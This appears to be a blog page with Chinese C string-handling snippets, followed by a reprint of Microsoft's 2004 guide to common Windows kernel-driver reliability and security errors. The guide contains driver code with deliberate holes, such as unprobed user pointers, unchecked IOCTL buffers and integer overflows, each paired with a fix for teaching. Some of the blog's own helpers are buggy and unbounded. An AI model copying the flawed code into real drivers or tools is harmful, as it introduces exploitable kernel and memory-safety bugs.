2005年11月22日

WCHAR转CHAR

void wtoA(WCHAR* source,char* dest)
{
	ULONG i;
	for (i = 0;i<wcslen(source)+1;i++){
		dest[i] = (char)source[i];
	}
}

CHAR转WCHAR

VOID Atow(char* source,WCHAR* dest)
{
	ULONG	i;
	memset(dest,0,wcslen(dest));
	for(i = 0;i < strlen(source);i++){
		dest[i] = source[i];
	}
}
//--------------------------------------------------------------------

取一段字符串的各个部分

VOID GetArg(char* commAndline,int* Argc,char* Argv[])
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' '){
			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' '){
				i++;
			}
			Argv[index] = commAndline + i;
			index ++;
			i--;
		}
	}
	*Argc = index;
}
//--------------------------------------------------------------------

用法:

int main(void){

	char		str[1024];
	int			Argc;
	char*		Argv[9];
	int			i;

	strcpy(str,"cd windows dfdf f            d");
	GetArg(str,&Argc,Argv);
	for (i = 0;i < Argc;i++){
		printf("%s\n",Argv[i]);
	}
	return 0;
}
//--------------------------------------------------------------------

结果:

cd
windows
dfdf
f
d

改进了点,可以处理"了,比如cd "progrAm files",得到的参数就是 cd 和progrAm files

VOID GetArg(char* commAndline,int* Argc,char* Argv[])
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' ' && commAndline[i+1] != ' ' && commAndline[i+1] != '\0'){			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' ' && i<length){
				i++;
			}
			Argv[index] = commAndline + i;
			index ++;

			if(commAndline[i] == '"'){   /////////////////////这段是对"的处理
				commAndline[i] = '\0';
				Argv[index-1] = (char*)Argv[index-1]+1;
				while(commAndline[i] != '"' && i<length){
					i++;
				}
				if (commAndline[i] == '"'){
					commAndline[i] = '\0';
					i--;
				}
			}//if                                //////////////
		}

	}
	*Argc = index;
}
//--------------------------------------------------------------------

哎,又改进,加入最大参数个数

VOID GetArg(char* commAndline,int* Argc,char* Argv[],ULONG	mAxArgc)
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' ' && commAndline[i+1] != ' ' && commAndline[i+1] != '\0'){
			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' ' && i<length){
				i++;
			}
			if(index < mAxArgc){				//////////////处理最大参数个数 只取前mAxArgc个参数
				Argv[index] = commAndline + i;
				index ++;
			}									////////////////////////
			if(commAndline[i] == '"'){   /////////////////////这段是对"的处理
				commAndline[i] = '\0';
				Argv[index-1] = (char*)Argv[index-1]+1;
				while(commAndline[i] != '"' && i<length){
					i++;
				}
				if (commAndline[i] == '"'){
					commAndline[i] = '\0';
					i--;
				}
			}//if                                //////////////
		}

	}
	*Argc = index;
}
//--------------------------------------------------------------------

用法:

int main(void)
{
	char	str[60];
	ULONG	Argc;
	PCHAR	Argv[9];
	ULONG	i;

	strcpy(str,"dir  \"progrAm files\" ddd 44 55 66 7 8 9 10 11");
	GetArg(str,&Argc,Argv,9);
	printf("%d\n",Argc);

	for(i = 0;i<Argc;i++){
		printf("%s\n",Argv[i]);
	}

	return 0;
}
//--------------------------------------------------------------------

结果:

9
dir
progrAm files
ddd
44
55
66
7
8
9

2005年11月12日

Common Driver Reliability Issues

Microsoft Corporation

June 2004

Applies to:
   Microsoft Windows 98 / Windows Me
   Microsoft Windows 2000
   Microsoft Windows XP
   Microsoft Windows Server 2003
   Microsoft Windows codenamed "Longhorn"

Summary: This paper provides information about writing drivers for the Microsoft Windows family of operating systems. It describes a number of common errors and suggests how driver writers can find, correct, and prevent such errors. (37 printed pages)

Contents

Introduction
User-Mode Addresses in Kernel-Mode Code
Driver I/O Methods and Their Tradeoffs
Failing to Check Buffer Sizes in Buffered IOCTLs and FSCTLs
Returning Data in Uninitialized Bytes
Failing to Validate Variable-Length Buffers
Device State Validation
Cleanup and Close Routines
Device Control Routines
Synchronization
Shared Access
Locks and Disabling APCs
Handle Validation
Requests to Create and Open Files and Devices
Driver Unload Routines
Pageable Drivers and DPCs
User-Mode APIs
StartIo Recursion
Passing and Completing IRPs
Odd-length Unicode Buffers
Pool Allocation in Low Memory
Call to Action and Resources

Introduction

Drivers occupy a significant portion of the total code base executed in kernel mode. Consequently, efforts to improve the reliability and security of the system must address this large code base.

This paper describes a variety of problems commonly seen in drivers, often with code that shows typical errors, and how to fix them. The code has been edited for brevity.

This paper is for developers who are writing kernel-mode drivers. The information in this paper applies for the Microsoft Windows family of operating systems.

User-Mode Addresses in Kernel-Mode Code

When providing services to user-mode code, drivers and other kernel-mode components usually receive and return data in buffers. To avoid corruption of data, disclosure of sensitive or security-critical data, or exceptions that cannot be handled by the try/except mechanism, kernel components must ensure that each data pointer they receive from user mode is a valid user-mode pointer. This operation is called probing.

Drivers must obey the following rules when handing pointers obtained from user mode:

  • Probe all user-mode pointers before referencing them.

    To probe a pointer, use the macro ProbeForRead or ProbeForWrite, or the memory management routine MmProbeAndLockPages.

  • Enclose all references to user-mode pointers in try/except blocks. The mapping of user-mode memory can change at any instant for various reasons, such as address space deletion, protection change, or decommit. Therefore, any reference to a user-mode pointer could raise an exception.
  • Assume that user-mode pointers can be aligned on any boundary.
  • Be prepared for changes to the contents of user-mode memory at any time; another user-mode thread in the same process might change it. Drivers must not use user-mode buffers as temporary storage, or expect the results of double fetches to yield the same results the second time.
  • Validate all data received from user-mode code.

Handling user-mode pointers incorrectly can result in the following:

  • Crashes caused by references to portions of the kernel address space that the Memory Manager considers reserved. It is a serious error for any driver to reference such address space.
  • Crashes caused by references to input/output (I/O) space, if the architecture uses memory-mapped device registers. Such references (reads and writes) can also have negative effects on the device itself.
  • Disclosure of sensitive data if the caller passes a pointer to an area that is unreadable by user mode, then observes the driver’s responses or return values to deduce the contents of the protected location.
  • Corruption of kernel data structures by writing to arbitrary kernel addresses, which can cause crashes or compromise security.

Probing

To understand when probing is necessary, consider the following sample routines, SetUserData and GetUserData. These samples represent fictitious system service routines, but could also be driver routines keyed on input/output control (IOCTL) or file system control (FSCTL) values; the only difference is that the driver code is more complicated. These routines show a situation in which probing is necessary. To simplify the example, the sample routines do not include locks to prevent race conditions and similar details that normally should be present in such code.

Example Routines That Do Not Use Probing

SetUserData receives a buffer from user mode and copies it to a global location. This routine represents any kernel component that receives data from user mode.

VOID
SetUserData (
    IN PWCHAR DataPtr,    // Pointer from user mode
    IN ULONG DataLength
    )
{
      //
      // Truncate data if it's too big.
      //
      if (DataLength > MAX_DATA_LENGTH) {
          DataLength = MAX_DATA_LENGTH;
      }

      //
      // Copy user buffer to global location.
      //
      memcpy (InternalStructure->UserData, DataPtr, DataLength);
      InternalStructure->UserDataLength = DataLength;
}

GetUserData returns to the caller data that was previously set with SetUserData:
ULONG
GetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
      //
      // Truncate data if it's too big.
      //
      if (DataLength > InternalStructure->UserDataLength) {
           DataLength = InternalStructure->UserDataLength;
      }   

      memcpy (DataPtr, InternalStructure->UserData, DataLength);

      return DataLength;
}

Problems Caused by Failing to Probe

In the examples in the previous section, both SetUserData and GetUserData fail to validate DataPtr. If the pointer is invalid, the caller could cause a system crash, thus compromising operating system integrity. If the pointer specifies a memory address that the caller does not have the right to read, the caller might also be able to deduce the contents of that address. Because the operating system maintains data for all processes in global pool addresses, a caller could pass an invalid pointer and then inspect the returned data for passwords or program output text strings generated by operating system users.

Routines that have pointer validation problems like these could easily be used to compromise system security. A hostile program could repeatedly call SetUserData with kernel addresses, followed by calls to GetUserData to retrieve the contents of the kernel address space. The program could then look for interesting data that is private to other users of the system, such as cached file data for files to which the caller has no access. In this situation, the kernel returns data that the caller has no permission to see.

In addition, reading certain kernel addresses can cause unwanted side effects. For example, some addresses are pageable but should be paged only within certain process contexts, such as thread stacks; in other contexts, a bug check can occur. Also, certain device registers may be mapped into virtual memory. Reading from memory locations that are mapped this way directly affects the hardware. For example, reading from a control register of a programmed I/O device might cause the device to lose incoming data, or might start or stop the device.

Example Routines That Use Probing

Both SetUserData and GetUserData must validate every user-mode pointer. The following shows correct code for SetUserData, which probes user-mode pointers before accessing them.

VOID
SetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
  //
  // Truncate data if it's too big.
  //
  if (DataLength > MAX_DATA_LENGTH) {
     DataLength = MAX_DATA_LENGTH;
  }

  //
  // Copy user buffer to global location.
  //
  try {
       ProbeForRead( DataPtr,
                      DataLength,
                      TYPE_ALIGNMENT( WCHAR ));
       memcpy (InternalStructure->UserData,
               DataPtr, DataLength);
       InternalStructure->UserDataLength = DataLength;
  } except( EXCEPTION_EXECUTE_HANDLER ) {
  // Use GetExceptionCode() to return an error to the
  // caller.
 }
}

The correct code validates the pointer at DataPtr by calling the macro ProbeForRead in a try/except block.

The following shows the corrected code for GetUserData.

VOID
GetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
  //
  // Truncate data if it's too big.
  //
  if (DataLength > InternalStructure->UserDataLength) {
       DataLength = InternalStructure->UserDataLength;
  }

  try {
       ProbeForWrite( DataPtr,
                      DataLength,
                      TYPE_ALIGNMENT( WCHAR ));
       memcpy (DataPtr, InternalStructure->UserData,
               DataLength);
       InternalStructure->UserDataLength = DataLength;
      } except( EXCEPTION_EXECUTE_HANDLER ){
  // Use GetExceptionCode() to return an error to the
  // caller.

   DataLength=0;
   }
  return DataLength;
}

The correct code validates the pointer at DataPtr by calling the macro ProbeForWrite in a try/except block.

Addresses Passed in METHOD_NEITHER IOCTLs and FSCTLs

The I/O Manager does not validate user-mode addresses passed in METHOD_NEITHER IOCTLs and FSCTLs. To ensure that such addresses are valid, the driver must use the ProbeForRead and ProbeForWrite macros, enclosing all buffer references in try/except blocks.

In the following example, the driver does not validate the address passed in the Type3InputBuffer.

case IOCTL_GET_HANDLER: {
      PULONG EntryPoint;

      EntryPoint =
         IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
      *EntryPoint = (ULONG) DriverEntryPoint;

The following code correctly validates the address and avoids this problem.

case IOCTL_GET_HANDLER: {
      PULONG_PTR EntryPoint;

      EntryPoint =
         IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;

      try {
           if (Irp->RequestorMode != KernelMode) {
           ProbeForWrite(EntryPoint,
                         sizeof( ULONG_PTR ),
                         TYPE_ALIGNMENT( ULONG_PTR ));
          }
      *EntryPoint = (ULONG_PTR)DriverEntryPoint;

      } except( EXCEPTION_EXECUTE_HANDLER ) {
...

Note also that the correct code casts DriverEntryPoint to a ULONG_PTR, instead of a ULONG. This change allows for use of this code in a 64-bit Windows environment.

Pointers Embedded in Buffered I/O Requests

Drivers must similarly validate pointers that are embedded in buffered I/O requests. In the following example, the structure member at arg is an embedded pointer.

struct ret_buf {
   void   *arg; // Pointer embedded in request
   int     rval;
   };

pBuf = Irp->AssociatedIrp.SystemBuffer;
   ...
arg = pBuf->arg; // Fetch the embedded pointer
   ...
// If the pointer is invalid,
// this statement can corrupt the system.
RtlMoveMemory(arg, &info, sizeof(info));

In this example, the driver should validate the embedded pointer by using the ProbeXxx macros enclosed in a try/except block, in the same way as for the METHOD_NEITHER IOCTLs described in the preceding section. Although embedding a pointer allows a driver to return extra information, a driver can more efficiently achieve the same result by using a relative offset or a variable length buffer.

Using Handles in User Context

Drivers often manipulate objects using handles, which can come from user mode or kernel mode. If the driver is running in system context, it can safely create and use handles because all threads within the system process are trusted. When running in user context, however, a driver must use handles with care.

Drivers should not create or pass handles to ZwXxx routines. These functions translate to calls to user-mode system services. Another thread in the process can change such handles at any instant. Using or creating handles within a user’s process makes the driver vulnerable to problems, as the following example shows.

status = IoCreateFile(&handle,
                      DesiredAccess,
                      &objectAttributes,
                      &ioStatusBlock,
                      NULL,
                      FILE_ATTRIBUTE_NORMAL,
                      FILE_SHARE_READ,
                      FILE_OPEN,
                      0,
                      NULL,
                      0,
                      CreateFileTypeNone,
                      NULL,
                      IO_NO_PARAMETER_CHECKING);

if ( NT_SUCCESS(status) ) {
   status = ObReferenceObjectByHandle(handle,
                      0,
                      NULL,
                      KernelMode,
                      &ccb->FileObject,
                      &handleInformation);

By the time ObReferenceObjectByHandle is called, the value of handle might have changed if:

  • Another thread closed and reopened the handle.
  • Another thread suspended the first thread and then successively created objects until it received the same handle value back again.

Similarly, handles received from user mode in other ways—for example, in a buffered I/O request—should not be passed to ZwXxx routines. Doing so makes a second transition into the kernel. When the ZwXxx routine runs, the previous processor mode is kernel; all access checks (even those against granted access masks of handles) are disabled. If a caller passes in a read-only handle to a file it lacks permission to write, and the driver then calls ZwWriteFile with the handle, the write will succeed. Similarly, calls to ZwCreateFile or ZwOpenFile with file names provided to the driver will successfully create or open files that should be denied to the caller.

Drivers can use the OBJ_FORCE_ACCESS_CHECK and OBJ_KERNEL_HANDLE flags in the OBJECT_ATTRIBUTES structure to safely use handles to manipulate objects. To set these flags, a driver calls InitializeObjectAttributes with the handle before creating the object.

The OBJ_FORCE_ACCESS_CHECK flag causes the system to perform all access checks on the object being opened. Handles created with OBJ_KERNEL_HANDLE can be accessed only in kernel mode. Drivers should use kernel-mode handles only when necessary, however; use of such handles can affect system performance, because Object Manager calls that use kernel handles attach to the system process. In addition, quota charges are made against the system process, and not against the original caller.

Driver I/O Methods and Their Tradeoffs

Drivers can use the following I/O methods:

  • Buffered I/O
  • Direct I/O
  • Neither buffered nor direct I/O (METHOD_NEITHER I/O)

In general, performance improves by moving from buffered I/O to direct I/O and from direct I/O to METHOD_NEITHER I/O, because the I/O Manager does less for the driver. The driver must do more work to validate requests, however, as the higher performing methods often require significantly more validation code to ensure that the driver is robust.

Buffered I/O

Buffered I/O requests are typically used by interfaces that require small transfer sizes or are called infrequently.

To handle a buffered I/O request, the I/O Manager:

  • Validates the user buffer pointers passed to it.
  • Allocates new buffers from non-paged pool for the input data.
  • Copies the user data to these newly allocated buffers.

The driver operates only on the buffers allocated by the I/O Manager, and not on the buffers allocated by the caller. The driver is therefore not required to validate the buffer pointers or handle exceptions if the caller’s address space becomes invalid.

Buffers allocated by the I/O Manager have the same alignment as allocated pool (8-byte alignment on the 32-bit systems). Consequently, the driver is not required to check for valid buffer alignment. The driver must validate the size and contents of the data, however. The data cannot change asynchronously because user-mode processes do not have access to the buffers.

After the driver completes a buffered I/O request, the I/O Manager executes an asynchronous procedure call (APC) to return to the original process context. The I/O Manager then copies data from the buffers written by the driver to the caller’s user-space output buffer.

Failing to check the size of buffers is perhaps the most common driver error in buffered I/O. This error can occur in many contexts, but is particularly troublesome in the following cases:

  • Failing to check buffer sizes in buffered IOCTLs and FSCTLs.
  • Returning data in uninitialized bytes.
  • Failing to validate variable-length buffers.

These cases are discussed in more detail in the sections that follow.

Failing to Check Buffer Sizes in Buffered IOCTLs and FSCTLs

When handling buffered IOCTLs and FSCTLs, a driver should always check the sizes of the input and output buffers to ensure that the buffers can hold all the requested data. If the RequiredAccess bits in the request specify FILE_ANY_ACCESS, as most driver IOCTLs and FSCTLs do, any caller that has a handle to the device also has access to buffered IOCTL or FSCTL requests for that device, and could read or write data beyond the end of the buffer.

For example, assume that the following code appears in a routine that is called from a dispatch routine, and that the driver has not validated the input buffer sizes passed in the IRP.

switch (ControlCode)
   ...
   ...
   case IOCTL_NEW_ADDRESS:{
      tNEW_ADDRESS *pNewAddress =
        pIrp->AssociatedIrp.SystemBuffer;

        pDeviceContext->Addr = ntohl (pNewAddress->Address);
        ...
  

The example does not check the buffer sizes before assigning a new value to pDeviceContext->Addr. As a result, the reference to pNewAddress->Address can cause a fault if the input buffer is not big enough to contain a tNEW_ADDRESS structure.

The following code checks the buffer sizes, avoiding the potential problem.

case IOCTL_NEW_ADDRESS: {
   tNEW_ADDRESS *pNewAddress =
     pIrp->AssociatedIrp.SystemBuffer;

  if (pIrpSp->Parameters.DeviceIoControl.InputBufferLength >=
       sizeof(tNEW_ADDRESS)){
         pDeviceContext->Addr = ntohl (pNewAddress->Address);
...

Code that handles other buffered I/O, such as WMI requests that use variable size buffers, can have similar errors.

Output buffer problems are similar to input buffer problems. They can easily corrupt the memory pool, and user-mode callers might be unaware that any error has occurred.

In the following example, the driver fails to check the size of the output buffer at SystemBuffer.

case IOCTL_GET_INFO: {

    Info = Irp->AssociatedIrp.SystemBuffer;

    Info->NumIF = NumIF;
    ...
    ...
    Irp->IoStatus.Information =
         NumIF*sizeof(GET_INFO_ITEM)+sizeof(ULONG);
    Irp->IoStatus.Status = ntStatus;
   }

Assuming that the NumIF field of the system buffer specifies the number of input items, this example can set IoStatus.Information to a value larger than the output buffer and thus return too much information to the user-mode caller. The preceding code could corrupt the memory pool by writing beyond the end of the system buffer.

Keep in mind that the I/O Manager does not validate the value in the Information field. The driver must check the output buffer size. If a caller passes a valid kernel-mode address for the output buffer and a buffer size of zero bytes, serious errors can occur.

Returning Data in Uninitialized Bytes

Drivers should initialize all output buffers with zeros before returning them to the caller. Failing to initialize a buffer can result in the inadvertent return of kernel-mode data in uninitialized bytes.

In the following example, a driver fails to initialize the buffer and thus unintentionally returns data in uninitialized bytes.

case IOCTL_GET_NAME: {
   ...
   ...
   outputBufferLength =
      ioStack->Parameters.DeviceIoControl.OutputBufferLength;
   outputBuffer =
      (PGET_NAME) Irp->AssociatedIrp.SystemBuffer;

   if (outputBufferLength >= sizeof(GET_NAME)) {
      length = outputBufferLength - sizeof(GET_NAME);
      ntStatus = IoGetDeviceProperty(
                  DeviceExtension->PhysicalDeviceObject,
                  DevicePropertyDriverKeyName,
                  length,
                  outputBuffer->DriverKeyName,
                  &length);

      outputBuffer->ActualLength = length + sizeof(GET_NAME);
      Irp->IoStatus.Information = outputBufferLength;
   } else {
     ntStatus = STATUS_BUFFER_TOO_SMALL;
   }

Setting IoStatus.Information to the output buffer size causes the whole output buffer to be returned to the caller. The I/O Manager does not initialize the data beyond the size of the input buffer—the input and output buffers overlap for a buffered request. Because the system support routine IoGetDeviceProperty does not write the entire buffer, this IOCTL returns uninitialized data to the caller.

Some drivers use the Information field to return codes that provide extra details about I/O requests. Before doing so, such drivers should check the IRP flags to ensure that IRP_INPUT_OPERATION is not set. When this flag is not set, the IOCTL or FSCTL does not have an output buffer, so the Information field does not supply a buffer size. In this case, the driver can safely use the Information field to return its own code.

Failing to Validate Variable-Length Buffers

Drivers should always validate variable-length buffers. Failure to do so can cause integer underflows and overflows.

Drivers often use input buffers with fixed headers and trailing variable-length data, as in the following example.

typedef struct _WAIT_FOR_BUFFER {
   LARGE_INTEGER Timeout;
   ULONG NameLength;
   BOOLEAN TimeoutSpecified;
   WCHAR Name[1];
   } WAIT_FOR_BUFFER, *PWAIT_FOR_BUFFER;

if (InputBufferLength < sizeof(WAIT_FOR_BUFFER)) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

WaitBuffer = Irp->AssociatedIrp.SystemBuffer;

if (FIELD_OFFSET(WAIT_FOR_BUFFER, Name[0]) +
       WaitBuffer->NameLength > InputBufferLength) {
         IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
         return( STATUS_INVALID_PARAMETER );
   }

Adding WaitBuffer->NameLength (a ULONG) to the offset (a LONG) can cause an integer overflow if the ULONG value is large. Instead, the driver should subtract the offset from InputBufferLength, and compare the result with WaitBuffer->NameLength, as in the following example.

if (InputBufferLength < sizeof(WAIT_FOR_BUFFER)) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

WaitBuffer = Irp->AssociatedIrp.SystemBuffer;

if ((InputBufferLength –
     FIELD_OFFSET(WAIT_FOR_BUFFER, Name[0])  >
       WaitBuffer->NameLength) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

The subtraction shown in the preceding example cannot cause a buffer underflow, because the first if statement ensures that the input buffer length is greater than or equal to the size of WAIT_FOR_BUFFER.

The following example shows a more complicated overflow problem.

case IOCTL_SET_VALUE:
      dwSize = sizeof(SET_VALUE);

    if(inputBufferLength < dwSize) {
       ntStatus = STATUS_BUFFER_TOO_SMALL;
       break;
    }

    dwSize = FIELD_OFFSET(SET_VALUE, pInfo[0]) +
            pSetValue->NumEntries * sizeof(SET_VALUE_INFO);

    if(inputBufferLength < dwSize) {
       ntStatus = STATUS_BUFFER_TOO_SMALL;
       break;
    }

In this example, an integer overflow can occur during multiplication. If the size of the SET_VALUE_INFO structure is a multiple of two, a NumEntries value such as 0×80000000 results in an overflow, when the bits are shifted left during multiplication. The buffer size passes the validation test, however, because the overflow causes dwSize to contain a small number. To avoid this problem, subtract the buffer lengths as shown in the previous example, then divide by sizeof(SET_VALUE_INFO) and compare the result with NumEntries to ensure that the buffer is the correct size.

Direct I/O

Drivers for devices that can transfer large amounts of data at a time, such as mass storage devices, typically use direct I/O. To handle a direct I/O request, the I/O Manager allocates the input buffer from non-paged pool and, if the length of the buffer is nonzero, creates a memory descriptor list (MDL) to map the output buffer. For an input request, the I/O Manager checks the output buffer for read access; for an output request, it checks the buffer for write access.

Drivers access the output buffer by calling the MmGetSystemAddressForMdlSafe macro to map the MDL into a system address range. This system address range contains the same physical pages as the original user buffer, but is unaffected by virtual address changes in the calling application. Drivers can therefore rely on the address to remain valid.

Because the user’s address space is doubly mapped to the system address range, two different virtual addresses have the same physical address. The following consequences of double mapping can sometimes cause problems for drivers:

  • The offset into the virtual page of the user’s address becomes the offset into the system page.

    Access beyond the end of the system buffer might go unnoticed for long periods of time depending on the page granularity of the mapping. Unless a caller’s buffer is allocated near the end of a page, data written beyond the end of the buffer will nevertheless appear in the buffer, and the caller will be unaware that any error has occurred. If the end of the buffer coincides with the end of a page, the system virtual addresses beyond the end could point to anything, or could be invalid. Such problems can be extremely difficult to find.

  • If the calling process has another thread that modifies the user’s mapping of the memory, the contents of the system buffer will change when the user’s memory mapping changes.

    In this situation, using the system buffer to store scratch data can cause problems. Two fetches from the same memory location might yield different values.

In addition, during read requests, drivers must not write to mapped areas that they have locked for read access. Inadvertently writing to an area that is locked for read access could allow a user-mode application to corrupt the global system state.

The most common direct I/O problem is incorrectly handling zero-length buffers. Because the I/O Manager does not create MDLs for zero-length transfers, a zero-length buffer results in a NULL value at Irp->MdlAddress. If a driver passes a NULL MdlAddress to MmGetSystemAddressForMdlSafe, mapping fails and the macro returns NULL. Drivers should always check for a NULL return value before attempting to use the returned address.

The following code snippet shows one possible error in direct I/O. The example receives a string in a direct I/O request, and then tries to convert that string to uppercase characters.

PWCHAR  PortName = NULL;

PortName = (PWCHAR)MmGetSystemAddressForMdlSafe
                   (irp->MdlAddress, NormalPagePriority);

//
// Null-terminate the PortName so that RtlInitUnicodeString // will not be invalid.
//
PortName[Size / sizeof(WCHAR) - 1] = UNICODE_NULL;

RtlInitUnicodeString(&AdapterName, PortName);

Because the buffer might not be correctly formed, the code attempts to force a Unicode NULL as the last buffer character. If the underlying physical memory is doubly mapped to both a user-mode and a kernel-mode address, another thread in the process can overwrite the buffer as soon as this write operation completes. If the UNICODE NULL character is not present, however, the call to RtlInitUnicodeString can exceed the range of the buffer and, if it falls outside the system mapping, possibly cause a bug check.

If a driver creates and maps its own MDL, it must access the MDL only with the method for which it has probed. When the driver calls MmProbeAndLockPages, it specifies an access method (IoReadAccess, IoWriteAccess, or IoModifyAccess). If the driver specifies IoReadAccess, it must not attempt to write to the system buffer made available by MmGetSystemAddressForMdlSafe.

Further problems can occur in direct I/O paths when resources are unavailable. If insufficient system page table entries (PTE) are available, MmGetSystemAddressForMdlSafe fails and returns NULL.

Note   Microsoft Windows 98 does not support MmGetSystemAddressForMdlSafe. In a WDM driver that must run on Windows 98, call MmGetSystemAddressForMdl, setting the MDL_MAPPING_CAN_FAIL MDL flag in the MdlFlags member of the MDL structure. MmGetSystemAddressForMdl is obsolete on Windows Me, Windows 2000, and all later releases.

Neither Buffered nor Direct I/O (METHOD_NEITHER)

When handling a METHOD_NEITHER I/O request, the I/O Manager does not validate the supplied buffer pointers and lengths. Drivers must validate the pointers, lengths, and alignment by probing. Drivers must also use try/except blocks around each access to the user buffer to handle any exceptions that might occur.

The driver must also manage the buffers and memory operations by itself. When possible, the driver should perform all operations on the buffer directly within the context of the calling thread. When running outside this context, the driver must use MmProbeAndLockPages to double-map and lock down the buffer, thus preventing asynchronous changes to the data.

Some file-system drivers and network transport drivers define IOCTLs for fast I/O. Fast I/O, which uses METHOD_NEITHER, involves transferring data directly between user buffers and the system cache. Because the data in the user buffers can change asynchronously, fast I/O dispatch routines can be difficult to code. All references to user buffers must be enclosed in try/except blocks, and all METHOD_NEITHER buffers must be probed.

If a driver allocates resources in a fast I/O path, the driver must subsequently release those resources if an exception occurs while referencing user-mode memory. Failing to release resources in such situations is a common driver error.

For most fast I/O paths, the I/O Manager calls the fast I/O dispatch routine from within a try/except block. A driver that allocates resources in a fast I/O path must include an exception handler in its fast I/O dispatch routine. A driver that performs fast I/O and access user-mode memory, but does not allocate resources in the fast I/O path, should include an exception handler in its fast I/O dispatch routine. It is not required to do so, however.

Device State Validation

In addition to validating pointers, drivers should validate device state in both the checked and free builds.

In the following example, the driver uses the ASSERT macro to check for the correct device state in the checked build, but does not check the device state in the free build.

case IOCTL_WAIT_FOR_EVENT:

     ASSERT((!Extension->WaitEventIrp));
     Extension->WaitEventIrp = Irp;
     IoMarkIrpPending(Irp);
     status = STATUS_PENDING;

In the checked build, if the driver already holds the IRP pending the system will assert. In the free build, however, the driver does not check for this condition. Two calls to the same IOCTL cause the driver to lose track of an IRP.

On a multiprocessor system, this code fragment might cause additional problems. Assume that on entry, the routine that includes this code has ownership of (the right to manipulate) the IRP. When the routine saves the Irp pointer in the global structure at Extension->WaitEventIrp, another thread can read the IRP address from that global structure and perform operations on the IRP. To prevent this problem, the driver should mark the IRP pending before it saves the IRP, and should include both the call to IoMarkIrpPending and the assignment in an interlocked sequence. A Cancel routine for the IRP might also be necessary.

Cleanup and Close Routines

Driver writers must not confuse the tasks required in DispatchCleanup and DispatchClose routines.

The I/O Manager calls a driver’s DispatchCleanup routine when the last handle to a file object is closed. A cleanup request indicates that an application is being terminated, or has closed a file handle for the file object that represents the driver’s device object. The I/O Manager still holds a reference to the file object, however. The I/O Manager calls the DispatchClose routine when the last reference is released from the file object.

The DispatchCleanup routine should cancel any IRPs that are currently queued to the target device for the file object, but must not free resources that are attached to the file object or that might be used by other Dispatch routines. Because the I/O Manager holds a reference to the file object, a driver can receive I/O requests for a file object after its DispatchCleanup routine has been called, but before its DispatchClose routine is called.

For example, a user-mode caller might close the file handle while an I/O Manager request is in progress from another thread. If the driver deletes or frees necessary resources before the I/O Manager calls its DispatchClose routine, invalid pointer references and other problems could occur.

Device Control Routines

The following errors are common in DispatchDeviceControl routines, which handle IOCTLs:

  • Breaking apart IOCTL and FSCTL values.
  • Converging code paths for public and private IOCTLs.
  • Checking only the requestor mode to validate IOCTL or FSCTL IRPs.

Breaking Apart IOCTL and FSCTL Values

A driver must use the full value of the IOCTL control code, and not a subset of the bits, in its dispatch routine. Access checks and the IOCTL method are encoded into the control code. Ignoring the values of these bit fields could make the driver vulnerable to other unvalidated IOCTL routes. For example,

IoControlCode =
      pIrpStack->Parameters.DeviceIoControl.IoControlCode;
ControlCode   = (IoControlCode >> 2) & 0x00000FFF;

pCmd = pIrp -> AssociatedIrp.SystemBuffer;

switch (ControlCode) {
      case IOCTL_SET_TIMEOUT:
           pTimeOut = pIrp -> AssociatedIrp.SystemBuffer;
           *pTimeOut = InterlockedExchange(
                           &pde->TimeOutValue,
                           *pTimeOut);

This code masks both the calling method and access bits before the switch statement. In this example, if the intended IOCTL required write access to the device to issue this request, a caller could execute the switch statement with a different IOCTL value that did not require write access, but matched the extracted bits. Even if this code checks the input buffer length, it cannot tell which fields of the IRP contain the input buffer unless it consults the method bits of the IOCTL.

The I/O Manager macro IoGetFunctionCodeFromCtlCode has the same problem as the preceding example. Drivers should not use this macro.

An alternative method that avoids these problems is to build an array of structures indexed by the IOCTL function code. One field of the structure might contain the dispatch routine and another field might contain the complete IOCTL or FSCTL control code to compare against the input. Using such a structure, a driver can check both the calling method and the access control bits in one compare operation.

Converging Code Paths for Public IOCTLs and Private IOCTLs

As a general rule, drivers should not contain converging execution paths for private (internal) and public IOCTLs or FSCTLs. A driver that creates private IOCTLs or FSCTLs should handle such requests separately from any public IOCTLs or FSCTLs that it also supports.

A driver cannot determine whether an IOCTL or FSCTL originated in kernel mode or user mode merely from checking the control code. Consequently, handling both along the same code path (or performing minimal validation and then calling the same routines) can open a driver to security breaches. If a private IOCTL or FSCTL is privileged, unprivileged users who know the control codes might be able to gain access to it.

Checking Only the Requestor Mode to Validate IOCTL or FSCTL IRPs

Drivers should not validate IOCTL and FSCTL requests in IRPs by checking the value of Irp->RequestorMode only. IRPs that arrive from the network and the Server service (SRVSVC) have a requestor mode of kernel, regardless of the origin of the request. A driver that relies on the previous processor mode for the thread could unintentionally use an invalid user-mode pointer without probing, or perform an operation for which the original requestor does not have the required permissions.

Instead, drivers should use the appropriate access control checks, such as FILE_READ_DATA, FILE_WRITE_DATA, and so forth.

Synchronization

On the Microsoft Windows NT, Microsoft Windows 2000, and Windows XP operating systems, drivers are multithreaded; they can receive multiple I/O requests from different threads at the same time. In designing a driver, you must assume that it will be run on a symmetric multiprocessor (SMP) system and take the appropriate measures to ensure data integrity.

